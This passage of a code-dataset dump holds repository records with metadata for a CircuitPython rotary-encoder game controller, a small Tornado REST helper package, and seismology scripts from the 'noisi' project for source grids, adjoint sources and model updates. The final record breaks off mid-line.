LEDs to indicate position (so it's easy to get 0). In hindsight, a colour scale on thes LEDs would have been nice.\n\nOverall, I think I prefer this pot without the sticking point in the middle. IT does need a big dead-zone, and the LEDs help as well.\n\n[](https://www.youtube.com/watch?v=P0G-hcmtkKg) \n\n(click to open YouTube video)\n\n## Experiment 3\nRotary encoder. This is actually the back of the board from Experiment 1. I couldn't find a nice big knob that I liked, so I cut one out of a scrap of plywood on the scroll saw, and hot-glued a small knob in it (this has the right bits for attaching to the rotary encoder shaft). I also screwed another knob on the wheel to act as a handle.\n\n[](https://www.youtube.com/watch?v=HdFMW8ZR8MQ) \n\n(click to open YouTube video)\n\n\n"
},
{
"alpha_fraction": 0.6679447889328003,
"alphanum_fraction": 0.6794478297233582,
"avg_line_length": 24.05769157409668,
"blob_id": "76bfe4149b55c81cbbd23d000e113aaebccc29e9",
"content_id": "1fd13dd1c3500c3e012928713bdf833b15026774",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1304,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 52,
"path": "/experiment_3_spinning/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import rotaryio\nimport board\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\nfrom adafruit_hid.keycode import Keycode\nfrom digitalio import DigitalInOut, Direction, Pull\nimport time\n\nkeyboard = Keyboard(usb_hid.devices)\nkeyboard_layout = KeyboardLayoutUS(keyboard)\n\nbutton = DigitalInOut(board.GP21)\nbutton.direction = Direction.INPUT\nbutton.pull = Pull.UP\n\nencoder = rotaryio.IncrementalEncoder(board.GP11, board.GP10)\nlast_position = 0\n\nlast_button = False\n\ndef pause():\n for i in range(20000):\n pass\n\nwhile True:\n position = encoder.position\n if last_position is None or position != last_position:\n print(position)\n if (last_position > position):\n keyboard.press(Keycode.Z)\n\n keyboard.release(Keycode.X)\n else:\n keyboard.press(Keycode.X)\n keyboard.release(Keycode.Z)\n\n if (last_position == position):\n keyboard.release(Keycode.Z)\n keyboard.release(Keycode.X)\n\n last_position = position\n\n if (not last_button and not button.value):\n keyboard.press(Keycode.Q)\n pause()\n last_button = True\n\n if (button.value):\n last_button = False\n keyboard.release(Keycode.Q)\n time.sleep(0.01)\n\n"
}
] | 6 |
hobarrera/tornado_rest
|
https://github.com/hobarrera/tornado_rest
|
7bb311d4e866ba49ec90cef0bc02666f546f61d0
|
220616d22c0eeab3dbededf88d471a74b68478f4
|
327d7d72fb166d6018eeb481870cddecf32d68be
|
refs/heads/master
| 2016-08-06T23:31:43.991277 | 2014-08-12T14:24:31 | 2014-08-12T14:24:31 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6202247142791748,
"alphanum_fraction": 0.6232209801673889,
"avg_line_length": 29.340909957885742,
"blob_id": "1672036de9ea6e6b62c22ef1925fd4d70239e76f",
"content_id": "e6459a51769b67933a3574f53b74acbaf4c7d101",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1335,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 44,
"path": "/tornado_rest/decorators.py",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "from functools import wraps\nfrom tornado.web import HTTPError\n\nimport cgitb\nimport json\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n\ndef handle_exceptions(method):\n \"\"\"\n Catches exceptions, logs them, and returns a generic error.\n\n This decorator will actually handle HTTPError exceptions properly and\n return the appropriate error code for this, along with the message json\n wrapped.\n\n This decorator **should** precede all others so as to also handle\n exceptions these might raise.\n \"\"\"\n\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n try:\n return method(self, *args, **kwargs)\n except HTTPError as e:\n logger.debug(e.log_message)\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(json.dumps({'message': e.log_message}, indent=2,\n cls=self.Encoder))\n self.set_status(e.status_code)\n self.finish()\n except Exception as e:\n logger.debug(\"Caught exception\")\n logger.exception(cgitb.text(sys.exc_info()))\n\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(json.dumps({'message': \"Internal server error\"}))\n self.set_status(500)\n self.finish()\n\n return wrapper\n"
},
{
"alpha_fraction": 0.6528662443161011,
"alphanum_fraction": 0.6592356562614441,
"avg_line_length": 23.153846740722656,
"blob_id": "505bf82d9fbed13e8320d5578c4200560a8fa752",
"content_id": "7c5ccbe640770736fb4f3f035e1e1c40d66e24ff",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 314,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 13,
"path": "/setup.py",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\n\nsetup(\n name='tornado_rest',\n version='1.0',\n author='Hugo Osvaldo Barrera',\n author_email='[email protected]',\n packages=['tornado_rest'],\n url='https://github.com/hobarrera/tornado_rest',\n license='ISC',\n description=\"Utilitary classes used for tornado-based REST proyects.\"\n)\n"
},
{
"alpha_fraction": 0.5992592573165894,
"alphanum_fraction": 0.6074073910713196,
"avg_line_length": 33.61538314819336,
"blob_id": "0249fa6ee4981ec6031e293f8e8ad54a0ec594b1",
"content_id": "6dad70b6c1b912f63650adaec1249a584c21b62d",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1350,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 39,
"path": "/tornado_rest/__init__.py",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "from tornado.web import RequestHandler\n\nimport json\nimport tornado\n\n\nclass RestHandler(RequestHandler):\n\n app_name = None\n app_ver = None\n Encoder = json.JSONEncoder\n\n def set_default_headers(self):\n if not (RestHandler.app_name is None or RestHandler.app_ver is None):\n self.set_header(\"Server\", \"{}/{} tornado/{}\"\n .format(RestHandler.app_name, RestHandler.app_ver,\n tornado.version))\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.set_header(\"Access-Control-Allow-Headers\",\n \"Content-Type, Cookie, Authorization, X-Filename\")\n self.set_header(\"Access-Control-Allow-Methods\",\n \"GET,PUT,POST,DELETE,OPTIONS\")\n self.set_header(\"Access-Control-Max-Age\", 86400)\n\n def respond(self, data=None, code=200):\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(json.dumps(data, indent=2, cls=RestHandler.Encoder))\n self.set_status(code)\n self.flush()\n self.finish()\n\n def options(self, *args, **kwargs):\n self.respond()\n\n def get_body_arguments(self):\n return json.loads(self.request.body.decode(\"UTF-8\"))\n\n def get_body_argument(self, name):\n return self.get_body_arguments()[name]\n"
},
{
"alpha_fraction": 0.7345454692840576,
"alphanum_fraction": 0.7490909099578857,
"avg_line_length": 33.375,
"blob_id": "aa07b1c97c3cb2958ff4aac17c2d77ec30ea1e77",
"content_id": "630d5044dd32d0c998e7d6714500e85e86beaba7",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 275,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 8,
"path": "/README.md",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "tornado_rest\n============\n\nThis python module includes a set of utilitary classes I commonly use for tornado-based proyects which expose REST APIs.\n\nThe main goal is to avoid copy-pasting so much, while helping reuse and maintainability.\n\nCopyright (c) 2014 Hugo Osvaldo Barrera <[email protected]>\n"
}
] | 4 |
jigel/noisi
|
https://github.com/jigel/noisi
|
1ce53e2e05a68b1c44c7786d6dd09048dbe93874
|
bb940c99069cf66a6ff7b267265a76af9e252c9c
|
5e28411b9d48f990c9e348f94dca50ac91abcf13
|
refs/heads/master
| 2021-05-09T23:59:57.223626 | 2018-09-27T13:22:49 | 2018-09-27T13:22:49 | 118,816,779 | 1 | 0 | null | 2018-01-24T20:15:00 | 2018-09-17T14:46:06 | 2018-09-26T18:51:40 |
Jupyter Notebook
|
[
{
"alpha_fraction": 0.5432717800140381,
"alphanum_fraction": 0.563324511051178,
"avg_line_length": 28.803150177001953,
"blob_id": "fd338d0e0060993efba9734df578015cf94e2220",
"content_id": "81f2bd0be50662e717c67307d77ac30981bd8465",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3790,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 127,
"path": "/noisi/scripts/source_grid.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport json\nimport os\nimport io\nfrom obspy.geodetics import gps2dist_azimuth\nfrom noisi.util.geo import len_deg_lat, len_deg_lon\nfrom warnings import warn\n \n\ndef points_on_sphere(dx,xmin=-180.,xmax=180.,ymin=-89.999,ymax=89.999,c_centr=None,\\\nradius=None):\n \"\"\"\n Calculate a more or less equally spaced grid on spherical Earth's surface.\n :param dx: spacing in latitudinal and longitudinal direction in meter\n :type c_centr: Tuple\n :param c_centr: Specify a central location\n :type radius: float\n :param radius: Radius around central location in m; no sources beyond this will be included\n :returns: np.array(latitude, longitude) of grid points, where -180<=lon<180 and -90 <= lat < 90\n \"\"\"\n \n if xmax <= xmin or ymax <= ymin:\n msg = 'Lower bounds must be lower than upper bounds.'\n raise ValueError(msg)\n\n \n gridx = []\n gridy = []\n \n lat = ymin\n if ymin == -90.:\n ymin = -89.999\n warn(\"Resetting lat_min to -89.999 degree\")\n \n while lat <= ymax:\n d_lat = dx / len_deg_lat(lat)\n d_lon = dx / len_deg_lon(lat)\n \n lon = xmin + np.random.rand(1)[0] * d_lon\n\n while lon <= xmax:\n \n gridx.append(lon)\n gridy.append(lat)\n\n if c_centr and radius:\n if gps2dist_azimuth(lat,lon,c_centr[0],c_centr[1])[0] > radius:\n print(lat,lon,gps2dist_azimuth(lat,lon,c_centr[0],c_centr[1])[0])\n if abs(lat) != 90.:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n continue\n else:\n break\n\n \n if abs(lat) == 90:\n # length of a degree longitude will be 0.\n break\n else:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n lat += d_lat # do not start at pole or zero division will raise...\n \n \n # return values sorted by longitude, basemap likes it.\n grid = list(zip(*sorted(zip(gridx, gridy), key=lambda it: it[0])))\n return list((gridx,gridy))#grid\n\n\n\n \ndef create_sourcegrid(config):\n \n cfile = open(config,'r')\n config = json.load(cfile)\n cfile.close()\n # ToDo: Pretty printing of all dictionaries such as this one.\n print(config)\n \n #ToDo read extra parameters into configuration\n grid = points_on_sphere(config['grid_dx'],\n xmin=config['grid_lon_min'],\n xmax=config['grid_lon_max'],\n ymin=config['grid_lat_min'],\n ymax=config['grid_lat_max'],\n c_centr=config['grid_coord_centr'],radius=config['grid_radius'])\n \n sources = np.zeros((2,len(grid[0])))\n #sources[0,:] = ids\n sources[0:2,:] = grid\n \n print('Number of gridpoints:',np.size(grid)/2)\n \n return sources\n \n \n#def grid_to_specfem_stations(grid,outfile):\n# \"\"\"\n# Write noisesource grid to disk as specfem compatible station list.\n# \"\"\"\n# \n# fid = open(outfile,'w')\n# for i in range(len(grid[0,:])):\n# fid.write('%08g SRC %10.8f %10.8f 0.0 0.0\\n'\\\n# %(i,grid[1,i],grid[0,i]))\n# \n# fid.close()\n# \n\ndef setup_sourcegrid(configfile,out='specfem'):\n \n sourcegrid = create_sourcegrid(configfile)\n \n with io.open(configfile,'r') as fh:\n config = json.load(fh)\n grid_filename = os.path.join(config['project_path'],'sourcegrid.npy')\n \n \n \n # write to .npy\n np.save(grid_filename,sourcegrid)\n # write to specfem friendly text file\n # or whatever\n #if out == 'specfem':\n #stations_filename = os.path.join(config['project_path'],'STATIONS')\n #grid_to_specfem_stations(sourcegrid,stations_filename)\n \n"
},
{
"alpha_fraction": 0.519087553024292,
"alphanum_fraction": 0.5252334475517273,
"avg_line_length": 33.96281051635742,
"blob_id": "f075b9862e932c26fd83ec10098bce3f0ae132c0",
"content_id": "3fd9046149f6e3e9e4629a5b3aac5b3f0ea62ce0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8461,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 242,
"path": "/noisi/scripts/run_adjointsrcs.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nfrom math import log, pi\nimport click\nimport json\nfrom scipy.signal import hilbert\nfrom glob import glob\nfrom obspy import read, Trace, Stream\nfrom obspy.geodetics import gps2dist_azimuth\n\nfrom noisi.scripts import adjnt_functs as af\nfrom noisi.util.corr_pairs import get_synthetics_filename\nfrom noisi.util.windows import my_centered, snratio\nfrom warnings import warn\n\ndef get_station_info(stats):\n\n sta1 = '{}.{}.{}.{}'.format(stats.network,stats.station,stats.location,\n stats.channel)\n sta2 = '{}.{}.{}.{}'.format(stats.sac.kuser0.strip(),stats.sac.kevnm.strip(),\n stats.sac.kuser1.strip(),stats.sac.kuser2.strip())\n lat1 = stats.sac.stla\n lon1 = stats.sac.stlo\n lat2 = stats.sac.evla\n lon2 = stats.sac.evlo\n dist = stats.sac.dist\n az = gps2dist_azimuth(lat1,lon1,lat2,lon2)[2]\n\n\n return([sta1,sta2,lat1,lon1,lat2,lon2,dist,az])\n\ndef get_essential_sacmeta(sac):\n\n newsacdict={}\n #==============================================================================\n #- Essential metadata\n #==============================================================================\n\n newsacdict['user0'] = sac['user0']\n newsacdict['b'] = sac['b']\n newsacdict['e'] = sac['e']\n newsacdict['stla'] = sac['stla']\n newsacdict['stlo'] = sac['stlo']\n newsacdict['evla'] = sac['evla']\n newsacdict['evlo'] = sac['evlo']\n newsacdict['dist'] = sac['dist']\n newsacdict['az'] = sac['az']\n newsacdict['baz'] = sac['baz']\n newsacdict['kuser0'] = sac['kuser0']\n try:\n newsacdict['kuser1'] = sac['kuser1']\n except KeyError:\n newsacdict['kuser1'] = ''\n newsacdict['kuser2'] = sac['kuser2']\n newsacdict['kevnm'] = sac['kevnm']\n\n return newsacdict\n\n\n\n\ndef adjointsrcs(source_config,mtype,step,ignore_network,bandpass,\n taper_perc,**options):\n\n \"\"\"\n Get 'adjoint source' from noise correlation data and synthetics.\n options: g_speed,window_params (only needed if mtype is ln_energy_ratio or enery_diff)\n \"\"\"\n\n\n files = [f for f in os.listdir(os.path.join(source_config['source_path'],\n 'observed_correlations')) ]\n files = [os.path.join(source_config['source_path'],\n 'observed_correlations',f) for f in files]\n\n\n step_n = 'step_{}'.format(int(step))\n synth_dir = os.path.join(source_config['source_path'],\n step_n,'corr')\n adj_dir = os.path.join(source_config['source_path'],\n step_n,'adjt')\n\n\n\n if files == []:\n msg = 'No input found!'\n raise ValueError(msg)\n\n #i = 0\n hws = options['window_params']['hw'][:]\n g_speed = options['g_speed'][:]\n\n\n with click.progressbar(files,label='Determining adjoint sources...') as bar:\n\n for f in bar:\n\n # read data\n try:\n tr_o = read(f)[0]\n except:\n print('\\nCould not read data: '+os.path.basename(f))\n #i+=1\n continue\n\n # read synthetics\n try:\n synth_filename = get_synthetics_filename(os.path.basename(f),\n synth_dir,ignore_network=ignore_network)\n if synth_filename is None:\n continue\n #sname = glob(os.path.join(synth_dir,synth_filename))[0]\n print(synth_filename)\n tr_s = read(synth_filename)[0]\n\n except:\n print('\\nCould not read synthetics: '+os.path.basename(f))\n #i+=1\n continue\n\n # Add essential metadata\n tr_s.stats.sac = get_essential_sacmeta(tr_o.stats.sac)\n\n # Check sampling rates.\n if round(tr_s.stats.sampling_rate,6) != round(tr_o.stats.\n sampling_rate,6):\n print(\"Sampling Rates (Hz):\\n\")\n print(tr_s.stats.sampling_rate)\n print(tr_o.stats.sampling_rate)\n msg = 'Sampling rates of data and synthetics must match.'\n raise ValueError(msg)\n\n \n func = af.get_adj_func(mtype)\n\n # ugly...sorry\n\n # Bandpasses\n for j in range(len(bandpass)):\n\n options['window_params']['hw'] = hws[j]\n options['g_speed'] = g_speed[j]\n\n tr_o_filt = tr_o.copy()\n tr_s_filt = tr_s.copy()\n \n # Waveforms must have same nr of samples.\n tr_s_filt.data = my_centered(tr_s_filt.data,tr_o.stats.npts)\n\n bp = bandpass[j]\n if bp != None:\n tr_o_filt.taper(taper_perc)\n tr_o_filt.filter('bandpass',freqmin=bp[0],freqmax=bp[1],\n corners=bp[2],zerophase=True)\n tr_s_filt.taper(taper_perc)\n tr_s_filt.filter('bandpass',freqmin=bp[0],freqmax=bp[1],\n corners=bp[2],zerophase=True)\n \n\n\n\n #======================================================\n # Weight observed stack by nstack\n #======================================================\n\n tr_o_filt.data /= tr_o_filt.stats.sac.user0\n \n data, success = func(tr_o_filt,tr_s_filt,**options)\n if not success:\n continue\n\n adj_src = Stream()\n\n if isinstance(data,list):\n\n adj_src += Trace(data=data[0])\n adj_src += Trace(data=data[1])\n brnchs = ['c','a']\n for k in range(2):\n adjtrc = adj_src[k]\n adjtrc.stats.sampling_rate = tr_s.stats.sampling_rate\n adjtrc.stats.sac = tr_s.stats.sac.copy()\n # Save the adjoint source\n file_adj_src = os.path.join(adj_dir,\n os.path.basename(synth_filename).\n rstrip('sac')+'{}.{}.sac'.format(brnchs[k],j))\n adjtrc.write(file_adj_src,format='SAC')\n\n\n else:\n adj_src += Trace(data=data)\n for adjtrc in adj_src:\n adjtrc.stats.sampling_rate = tr_s.stats.sampling_rate\n adjtrc.stats.sac = tr_s.stats.sac.copy()\n # Save the adjoint source\n file_adj_src = os.path.join(adj_dir,\n os.path.basename(synth_filename).\n rstrip('sac')+'{}.sac'.format(j))\n adjtrc.write(file_adj_src,format='SAC')\n return()\n\n\n\ndef run_adjointsrcs(source_configfile,measr_configfile,step,ignore_network):\n\n source_config=json.load(open(source_configfile))\n measr_config=json.load(open(measr_configfile))\n\n g_speed = measr_config['g_speed']\n mtype = measr_config['mtype']\n bandpass = measr_config['bandpass']\n taper_perc = measr_config['taper_perc']\n\n if bandpass == None:\n bandpass = [None]\n\n if type(bandpass[0]) != list and bandpass[0] != None:\n bandpass = [bandpass]\n warn('\\'Bandpass\\' should be defined as list of filters.')\n\n window_params = {}\n window_params['hw'] = measr_config['window_params_hw']\n if type(window_params['hw']) != list:\n window_params['hw'] = [window_params['hw']]\n if len(window_params['hw']) != len(bandpass):\n warn('Using the same window length for all measurements.')\n window_params['hw'] = len(bandpass)*[window_params['hw'][0]]\n if type(measr_config['g_speed']) in [float,int]:\n warn('Using the same group velocity for all measurements.')\n g_speed = len(bandpass)*[measr_config['g_speed']]\n elif type(measr_config['g_speed']) == list \\\n and len(measr_config['g_speed']) == len(bandpass):\n g_speed = measr_config['g_speed']\n\n window_params['sep_noise'] = measr_config['window_params_sep_noise']\n window_params['win_overlap'] = measr_config['window_params_win_overlap']\n window_params['wtype'] = measr_config['window_params_wtype']\n window_params['causal_side'] = measr_config['window_params_causal']\n window_params['plot'] = False \n adjointsrcs(source_config,mtype,step,ignore_network=ignore_network,\n g_speed=g_speed,bandpass=bandpass,\n taper_perc=taper_perc,window_params=window_params)\n"
},
{
"alpha_fraction": 0.6703763604164124,
"alphanum_fraction": 0.6835289597511292,
"avg_line_length": 30.578275680541992,
"blob_id": "f19e29c7e37d17e4e8aa49e0328d010b00da781c",
"content_id": "16814f676cd40fe0416901faa6df71342117fbe2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9884,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 313,
"path": "/noisi/scripts/create_update.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport os\nimport json\n\nfrom glob import glob\nfrom math import isnan\nimport sys\nfrom noisi.util.corr_pairs import glob_obs_corr\nfrom noisi.my_classes.noisesource import NoiseSource\nfrom warnings import warn\n####################################\n# ToDo: more fancy and more secure with click or argparse\nsource_model = sys.argv[1]\noldstep = int(sys.argv[2])\ngrad_file = sys.argv[3]\ngrad_old = sys.argv[4]\nupdate_mode = sys.argv[5]#'conjgrad'# steepest, conjgrad\nmin_snr = float(sys.argv[6])#min_snr = 5.0\nmin_stck = int(sys.argv[7])#min_stck = 320.\nnr_msr = int(sys.argv[8])#nr_msr = 300\nstep_length = float(sys.argv[9])#step_length = \nmode = sys.argv[10] # 'max', 'random'\n# Give as part per hundred, e.g 0.1 for 10%\nperc_step_length = None\n# include those data points in the test which are at or above this\n# fraction of maximum misfit:\nperc_of_max_misfit = 0.6666\n# Only if the following is set to True, a small subset (nr_msr) \n# of data will be selected and copied and their misfit evaluated\n# for a step length test. Otherwise, only the update of the source model\n# is performed. \n\n####################################\n\n\ndef _update_steepestdesc(model,\n\tneg_grad,\n\tstep_length=None,\n\tperc_step_length=None,\n\tproject=False,\n\tsmooth=False):\n\n\tif step_length is not None and perc_step_length is not None:\n\t\traise ValueError('Only one of step_length and perc_step_length can\\\n\t\t\tbe specified.')\n\n# just in case:\n\t#os.system('cp {} {}'.format(model,model+'.bak'))\n\n\t\n\n# smooth the model\n\tif smooth:\n\t\traise NotImplementedError('Sorry, not implemented yet.')\n\n# project the model\n\tif project:\n\t\traise NotImplementedError('Sorry, not implemented yet.')\n\t\t# if implemented, here should be a projection of the new kernel\n\t\t# onto the distr_basis functions, thereby yielding the new distr_weights\n\n\telse:\n\t# the spectrum remains unchanged.\n\t# assuming there is one basis only, this will be updated with the new kernel\n\t\tif step_length is not None:\t\n\t\t\t#src_model.model['distr_basis'][:] += neg_grad * step_length\n\t\t\tdescent_direction = neg_grad * step_length\n\t\telif perc_step_length is not None:\n\t\t\t#src_model.model['distr_basis'][:] += neg_grad/np.max(np.abs(neg_grad)) * perc_step_length\n\t\t\tdescent_direction = neg_grad/np.max(np.abs(neg_grad)) * perc_step_length\n\n# write to file\n# close the underlying h5 file\t\n\t#src_model.model.close()\n\n\treturn(descent_direction)\n\ndef _update_conjugategrad(\n\tmodel,\n\tneg_grad,\n\told_grad,\n\told_upd,\n\tupdatename,\n\tstep_length\n\t):\n# just in case:\n\t#os.system('cp {} {}'.format(model,model+'.bak'))\n\n\t#src_model = NoiseSource(model)\n\n\t# determine beta\n\tnorm_neggrad = np.linalg.norm(-1.*neg_grad,ord=2,axis=(1))\n\tnorm_oldgrad = np.linalg.norm(old_grad,ord=2,axis=(1))\n\n\tbeta = np.power(norm_neggrad,2) / np.power(norm_oldgrad,2)\n\tprint(beta)\n\tprint(neg_grad[0:10])\n\tbeta_update = np.dot(beta,old_upd)\n\tprint(beta_update[0:10])\n\n\tupd = neg_grad + beta_update\n\tnp.save(updatename,upd)\n\n\t# save the update so it can be used to determine the next step\n\t#np.save(updatename,upd)\n\n\t#src_model.model['distr_basis'][:] += step_length * upd\n\tdescent_direction = step_length * upd\n\t\n\n\tprint(step_length*upd[0:20])\n\t\n\t\n\treturn(descent_direction,upd)\n\n\n\ndef _prepare_test_steplength(msrfile,source_config,newdir):\n\t\n\tobs_dir = os.path.join(source_config['source_path'],'observed_correlations')\n\n\n\t# Read in the csv files of measurement.\n\tfor mfile in msrfile:\n\t\tif 'data' not in locals():\n\t\t\tdata = pd.read_csv(mfile)\n\t\telse:\n\t\t\t# We get the addition of both datasets, which means that l2_norms of all\n\t\t\t# measurements are added up and the stations pairs with max overall misfit are chosen\n\t\t\tdata.l2_norm += pd.read_csv(mfile).l2_norm\n\t\t\tdata.nstack += pd.read_csv(mfile).nstack\n\n\n\t# Get a set of n randomly chosen station pairs. Criteria: minimum SNR, \n\t# ---> prelim_stations.txt\n\t\n\t# this makes no sense for combined measure\n\t#data_accept = data[(data.snr >= min_snr)]\n\t#if len(data_accept) == 0:\n#\t\traise ValueError('No data match selection criteria.')\n\n\t#data_accept = data_accept[(data_accept.snr_a >= min_snr)]\n\t#if len(data_accept) == 0:\n#\t\traise ValueError('No data match selection criteria.')\n\n\t#data_accept = data_accept[(data_accept.nstack >= min_stck)]\n\tdata_accept = data[(data.nstack >= min_stck)]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\t\n\tdata_accept = data_accept[~(data_accept.l2_norm.apply(np.isnan))]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\n\tdata_accept = data_accept[~(data_accept.snr.apply(np.isnan))]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\n\tdata_accept = data_accept[~(data_accept.snr_a.apply(np.isnan))]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\t\n\n\t# select data...\n\tif mode =='random':\n\t\tdata_select = data_accept.sample(n=nr_msr)\n\telif mode == 'max':\n\t\tdata_select1 = data_accept.sort_values(by='l2_norm',na_position='first')\n\t\tdata_select = data_select1.iloc[-nr_msr:]\n\t\n\tprint(data_select)\n\n\t#data_select = pd.concat([data_select1,data_select2])\n\t\n\t#stafile = open(os.path.join(newdir,'stations_slt.txt'),'w')\n\t#stafile.write(\"Station pairs to be used for step lenght test:\\n\")\n\n\tinffile = open(os.path.join(newdir,'step_length_test_info.txt'),'w')\n\tinffile.write('Parameters:\\n')\n\tinffile.write('source_model: %s\\n' %source_model)\n\tinffile.write('old step: %s\\n' %oldstep)\n\tinffile.write('min_snr %g\\n' %min_snr)\n\tinffile.write('min_stck %g\\n' %min_stck)\n\n\tif step_length is not None:\n\t\tinffile.write('step_length %g\\n' %step_length)\n\telif perc_step_length is not None:\n\t\tinffile.write('step_length as fraction of max. weight%g\\n' %perc_step_length)\n\tinffile.write('-'*40)\n\tinffile.write(\"\\nStation pairs to be used for step lenght test:\\n\")\n\n\tcum_misf = 0.0\n\t# Take care of the test set for the step length test\n\t\n\tfor i in data_select.index:\n\t\t\n\t\tsta1 = data_select.at[i,'sta1'].split('.')[0:4]\n\t\tsta2 = data_select.at[i,'sta2'].split('.')[0:4]\n\t\t\n\t\t#lat1 = data_select.at[i,'lat1']\n\t\t#lat2 = data_select.at[i,'lat2']\n\t\t#lon1 = data_select.at[i,'lon1']\n\t\t#lon2 = data_select.at[i,'lon2']\n\n\t\tmisf = data_select.at[i,'l2_norm']\n\n\t\tcum_misf += misf\n\t\t# synthetics in the old directory?\n\t\t#synth_filename = os.path.join(datadir,'corr','{}--{}.sac'.format(sta1,sta2))\n\t\t#print(synth_filename)\n\t\t# copy the relevant observed correlation, oh my\n\t\tobs_dir = os.path.join(source_config['source_path'],'observed_correlations')\n\t\tobs_correlations = glob_obs_corr('{}.{}.{}.{}'.format(*sta1),\n\t\t\t'{}.{}.{}.{}'.format(*sta2),obs_dir,ignore_network=True)\n\t\t\n\n\t\tif len(obs_correlations) > 0:\n\n\t\t\t# Use preferentially '', '00' channels.\n\t\t\tobs_correlations.sort()\n\t\t\tcorr = obs_correlations[0]\n\n\t\t\t#sta1 = sta1.split('.')\n\t\t\t#sta2 = sta2.split('.')\n\t\t\t#stafile.write('{} {} {} {}\\n'.format(*(sta1[0:2]+[lat1]+[lon1])))\n\t\t\t#stafile.write('{} {} {} {}\\n'.format(*(sta2[0:2]+[lat2]+[lon2])))\n\n\t\t\t#inffile.write('{} {}, {} {} L2 misfit: {}\\n'.format(*(sta1[0:2]+sta2[0:2]+[misf])))\n\t\t\tinffile.write('{}, {} L2 misfit: {}\\n'.format(sta1,sta2,misf))\n\n\t\t\tos.system('cp {} {}'.format(corr,os.path.join(newdir,'obs_slt')))\n\t\t\n\n\n\tinffile.write('-'*40)\n\tinffile.write('\\nCumulative misfit: %g\\n' %cum_misf)\n\tinffile.write('-'*40)\n\tinffile.close()\n\t#stafile.close()\n\n\treturn()\n\n############ Preparation procedure #################################################\n#prepare_test_steplength = False\n# where is the measurement database located?\nsource_model = os.path.join(source_model,'source_config.json')\nsource_config=json.load(open(source_model))\ndatadir = os.path.join(source_config['source_path'],'step_' + str(oldstep))\nmsrfile = os.path.join(datadir,\"{}.*.measurement.csv\".format(source_config['mtype']))\nmsrfile = glob(msrfile)\n\n# Initialize the new step directory\nnewstep = int(oldstep) + 1\nnewdir = os.path.join(source_config['source_path'],'step_' + str(newstep))\n\nif not os.path.exists(newdir):\n\tnewdir = os.path.join(source_config['source_path'],'step_' + str(newstep))\n\tos.mkdir(newdir)\n\tos.mkdir(os.path.join(newdir,'obs_slt'))\n\tos.mkdir(os.path.join(newdir,'corr'))\n\tos.mkdir(os.path.join(newdir,'adjt'))\n\tos.mkdir(os.path.join(newdir,'grad'))\n\tos.mkdir(os.path.join(newdir,'kern'))\n\t_prepare_test_steplength(msrfile,source_config,newdir)\n\nos.system('cp {} {}'.format(os.path.join(datadir,'base_model.h5'),newdir))\nos.system('cp {} {}'.format(os.path.join(datadir,'starting_model.h5'),newdir))\n\n\n# Set up a prelim_sourcemodel.h5: \n# Contains starting model + step length * (-grad) for steepest descent\n# This would be the point to project to some lovely basis functions..\ngrad = grad_file\n\nneg_grad = -1. * np.load(grad)\nold_grad = np.load(grad_old)\n\nneg_grad = np.array(neg_grad,ndmin=2)\nold_grad = np.array(old_grad,ndmin=2)\n\nnew_sourcemodel = os.path.join(newdir,'starting_model.h5')\nnew_update = os.path.join(newdir,'grad','update.npy')\nold_upd = os.path.join(datadir,'grad','update.npy')\n\nsrc_model = NoiseSource(new_sourcemodel,w='r+')\n\nif not os.path.exists(old_upd):\n\told_upd = -1. * old_grad.copy()\nelse:\n\told_upd = np.load(old_upd)\n\nif update_mode == 'steepest':\n\n\tdescent_direction = _update_steepestdesc(new_sourcemodel,neg_grad,step_length=step_length,\n\tperc_step_length=perc_step_length,project=False,smooth=False)\n\nelif update_mode == 'conjgrad':\n\tdescent_direction, update = 